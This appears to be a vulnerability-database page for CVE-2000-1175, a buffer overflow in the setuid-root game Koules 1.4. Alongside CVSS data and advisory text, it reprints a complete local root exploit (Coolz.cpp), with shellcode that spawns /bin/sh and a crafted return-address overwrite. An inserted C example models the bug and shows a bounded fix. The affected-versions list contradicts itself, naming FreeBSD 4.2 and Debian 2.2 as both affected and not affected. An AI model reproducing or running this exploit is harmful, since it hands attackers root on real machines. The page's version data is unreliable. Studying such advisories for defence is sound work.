CVE-2000-1175
CVSS 7.2
Published: 2001-01-09 00:00:00
Revised: 2008-09-05 16:22:50

[Original] Buffer overflow in Koules 1.4 allows local users to execute arbitrary commands via a long command line argument.


[CNNVD] Koules Svgalib Buffer Overflow Vulnerability (CNNVD-200101-033)

        Koules 1.4 contains a buffer overflow. A local user can execute arbitrary code by supplying an overly long command-line argument.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [the system can be taken down completely]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is needed to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1175
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1175
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-033
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1967
(VENDOR_ADVISORY)  BID  1967
http://www.securityfocus.com/archive/1/145823
(VENDOR_ADVISORY)  BUGTRAQ  20001120 local exploit for linux's Koules1.4 package

- Vulnerability information

Koules Svgalib Buffer Overflow Vulnerability
High severity, buffer overflow
Published 2001-01-09 00:00:00, updated 2005-10-20 00:00:00
Local
        Koules 1.4 contains a buffer overflow. A local user can execute arbitrary code by supplying an overly long command-line argument.

- Advisories and patches

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (20410)

Jan Hubicka Koules 1.4 Svgalib Buffer Overflow Vulnerability (EDBID:20410)
Platform: unix  Type: local
Date: 2000-11-20  Verified
Port: 0  Author: Synnergy.net
N/A
source : http://www.securityfocus.com/bid/1967/info

Koules is an original, arcade-style game authored by Jan Hubicka. The version using svgalib is usually installed setuid root so that it may access video hardware when being run at the console by regular users. This version contains a buffer overflow vulnerability that may allow a user to gain higher privileges. The vulnerability exists in the handling of user-supplied command-line arguments.

Successful exploitation of this vulnerability leads to root compromise. Debian has announced they are not vulnerable to this problem.


/*
   Coolz.cpp - yep a C Plus Plus exploit, I like that Strings STL :)

   This problem has been known since April this year, but I have not
   seen any exploit so far.

   First of all I wasn't planning to go and release another ordinary stack
   smash, but I found the setuid game on some wargame/hackme I played on.
   Funny thing was that the exploitability proved to be a bit harder than I
   had anticipated at first.

   The problem can be found in the Koules1.4 package, code file:
      koules.sndsrv.linux.c - function: init()

   The `int i` disappears in the optimization gcc does. Since the strcat()
   function concatenates an array of filenames, `argv` gets ruined.
   This will cause the first run of the loop to fail.
   If argv points somewhere into addressable memory space, the chances of
   having a second pointer in there are close to zero, thus the second loop
   will fail.
   Last of all, if argv[1] does point to a valid address the string
   contained there shouldn't be long enough to overwrite eip a second time,
   since that gets us into trouble. That's about it :)
   Even then, this ONLY works on machines that have compiled SVGALIB support
   in and NOT on the X windows version of 'koules'.

  Requested IRC quotes:
    <dagger02> my balls itch.

    <marshal-> what are you up to now, man
    <sArGeAnt> one more time, sucker
    <sArGeAnt> and you can watch how the packets come into your modem

    <gmd-> sex ?

    <orangehaw> Scrippie SHUT UP OR I'll PACKET You ? ;)

    <silvio> chicks dig me when i place a bet, cause the mandelbrot sucks
             compared to the julia set

    <jimjones> 4 years ago there was no aol account i couldnt phish, now my
               unix virii grow faster than the petri dish

    <dugje>  I've seen nasa.gov navy.mil compaq.com and microsoft.com, there
             is only one goal left .. *.root-servers.net.

   Love goes out to: Hester and Maja
   Shouts go out to: Aad de Bruin, Karel Roos, L.G. Weert, Louis Maatman,
                     Richard Vriesde.
             --  We always did feel the same, we just saw it from a
                  different point of view...
                      [Bob Dylan - Tangled up in Blue]

<Scrippie> wonder what they'll do at the KLPD when they read that (:
<dugje> hehe ... move you up a spot on the priority list ..

   -- Scrippie/ronald@grafix.nl
*/

/* Synnergy.net (c) 2000 */

#include <cstdio>
#include <cstdlib>
#include <cstring>      /* memcpy() */
#include <string>
#include <unistd.h>

using namespace std;

#define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux"

#define NOP     'A'
#define NUMNOPS 500
#define RETADDY "\x90\xfe\xff\xbf"
/* Since we return in the cleared environment, we don't need to have a
   return address we can influence by command line "offset" arguments */

/* Linux/x86 execve("/bin/sh") shellcode, placed in env[0] behind the NOPs */
string heavenlycode =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char *addytostr(unsigned char *);

int main()
{
   string payload, vector;
   unsigned int i;
   const char *env[3];
   const char *ptr_to_bffffffc;

   /* Construction of our payload: NOP sled followed by the shellcode */
   payload.append(NUMNOPS, NOP);
   payload.append(heavenlycode);

   env[0] = payload.c_str();
   /* This memory address always contains 0x00000000 */
   env[1] = "\xfc\xff\xff\xbf";
   env[2] = NULL;

   /* Calculate for yourself, and check out: linux/fs/exec.c
      (sizeof(heavenlycode) is the size of the std::string object, not the
      shellcode length; the arithmetic is kept as in the original exploit) */
   ptr_to_bffffffc =
        addytostr((unsigned char *)(0xc0000000-sizeof(void *)-sizeof(FILENAME)
                                    -sizeof(heavenlycode)-sizeof(char *)-1));

   for(i=0;i<256;i++) {
      vector.append(RETADDY);           /* Fill the buffer */
   }
   /* We do NOT overwrite 'int i' - a register is used after gcc -O */
   vector.append(RETADDY);              /* Overwrites ebp */
   vector.append(RETADDY);              /* Overwrites eip */
   vector.append(ptr_to_bffffffc);      /* Overwrites argv argument */

   /* argv[0] is cosmetic; argv[1] carries the overflow, argv[2] is filler.
      execle() wants char *const envp[], hence the cast on env. */
   execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(), "A",
          (char *)NULL, (char *const *)env);

   perror("execle()");
   return EXIT_FAILURE;
}

/* Return the raw little-endian bytes of a pointer as a NUL-terminated string */
char *addytostr(unsigned char *blaat)
{
   char *ret;

   if(!(ret = (char *)malloc(sizeof(unsigned char *)+1))) {
      perror("malloc()");
      exit(EXIT_FAILURE);
   }
   memcpy(ret, &blaat, sizeof(unsigned char *));
   ret[sizeof(unsigned char *)] = 0x00;

   return(ret);
}
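An added example, not part of the Koules sources or the Synnergy exploit above: a hypothetical C model of the bug class the exploit header describes (a setuid-root sound helper whose init() strcat()s user-supplied file names into a fixed stack buffer), placed beside a bounded replacement that rejects overlong or directory-escaping names and drops root before it looks at argv. The buffer size NAMEBUF, the directory SOUNDDIR and every function name are assumptions made for illustration; the real koules.sndsrv.linux.c is not on this page.

```c
/* Added example: a hypothetical model of the koules.sndsrv.linux.c init()
   bug class described above, beside a hardened version. Nothing here is
   from the Koules sources or the Synnergy exploit; NAMEBUF, SOUNDDIR and
   every function name are assumptions made for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define NAMEBUF 256                               /* assumed buffer size */
#define SOUNDDIR "/usr/local/lib/koules/sounds"   /* assumed sound directory */

/* Vulnerable pattern (reconstruction, never called below): each argv[] is
   strcat()ed into a fixed stack buffer with no length check. A 1000-byte
   argument runs past `name`, over the saved ebp and the return address,
   which is what the exploit above overwrites with RETADDY. */
int init_unsafe(int argc, char **argv)
{
    char name[NAMEBUF];
    int i;                          /* the `int i` the exploit says gcc keeps in a register */
    for (i = 1; i < argc; i++) {
        name[0] = '\0';
        strcat(name, SOUNDDIR "/");
        strcat(name, argv[i]);      /* unbounded copy: the overflow */
        /* ... open(name, O_RDONLY) ... */
    }
    return 0;
}

/* Hardened replacement: build the path with snprintf, treat truncation as an
   error instead of silently continuing, and refuse names that could leave
   SOUNDDIR. Returns 0 on success, -1 if the name is rejected. */
int build_sound_path(char *out, size_t outsz, const char *dir, const char *name)
{
    if (name == NULL || name[0] == '\0')
        return -1;
    if (strchr(name, '/') != NULL || strstr(name, "..") != NULL)
        return -1;                                  /* no subdirectories, no traversal */
    int n = snprintf(out, outsz, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= outsz)
        return -1;                                  /* would not fit: reject, never truncate */
    return 0;
}

/* Give up the setuid-root privilege permanently before looking at argv.
   Returns 0 only when the process verifiably runs as the real user. */
int drop_privileges(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (getuid() != uid || geteuid() != uid)
        return -1;
    if (uid != 0 && setuid(0) == 0)
        return -1;                 /* root could be regained: the drop did not take */
    return 0;
}

/* Exercise the hardened builder on one name without needing a shell. */
int check_name(const char *name)
{
    char out[NAMEBUF];
    return build_sound_path(out, sizeof out, SOUNDDIR, name);
}

/* Constructed input: a name of `len` 'A's. SOUNDDIR is 28 bytes, so with the
   '/' any name of 227 bytes or more needs 256+ bytes and must be rejected. */
int check_name_len(size_t len)
{
    char *name = malloc(len + 1);
    if (name == NULL)
        return -1;
    memset(name, 'A', len);
    name[len] = '\0';
    int rc = check_name(name);
    free(name);
    return rc;
}

int main(int argc, char **argv)
{
    char path[NAMEBUF];
    if (drop_privileges() != 0) {
        perror("drop_privileges");
        return EXIT_FAILURE;
    }
    for (int i = 1; i < argc; i++) {
        if (build_sound_path(path, sizeof path, SOUNDDIR, argv[i]) != 0) {
            fprintf(stderr, "rejected sound name in argument %d\n", i);
            return EXIT_FAILURE;
        }
        printf("would load %s\n", path);
    }
    return EXIT_SUCCESS;
}
```

Rejecting a name that does not fit, rather than truncating it, is the point that matters for this bug class: a silently truncated path still opens the wrong file, while an overflow hands the caller the return address. Dropping root first means that even a remaining parsing bug in the helper yields only the invoking user's privileges.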
		

- Vulnerability information

13763
Koules Long Command Line Argument Overflow
Local Access Required, Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2000-11-20 Unknown
2000-11-20 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Koules Svgalib Buffer Overflow Vulnerability
Boundary Condition Error, BID 1967
Remote: No  Local: Yes
Published 2000-11-20 12:00:00, updated 2009-07-11 03:56:00
This vulnerability was announced by Guido Bakker <guidob@mainnet.nl> on November 20, 2000.

- Affected versions

Jan Hubicka Koules 1.4
- FreeBSD FreeBSD 4.2
- RedHat Linux 7.0
- Slackware Linux 7.1
FreeBSD FreeBSD 4.2
Debian Linux 2.2

- Not affected versions

FreeBSD FreeBSD 4.2
Debian Linux 2.2

- Vulnerability discussion

Koules is an original, arcade-style game authored by Jan Hubicka. The version using svgalib is usually installed setuid root so that it may access video hardware when being run at the console by regular users. This version contains a buffer overflow vulnerability that may allow a user to gain higher privileges. The vulnerability exists in the handling of user-supplied command-line arguments.

Successful exploitation of this vulnerability leads to root compromise. Debian has announced they are not vulnerable to this problem.

- Exploit

Exploit available:

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References

     

     
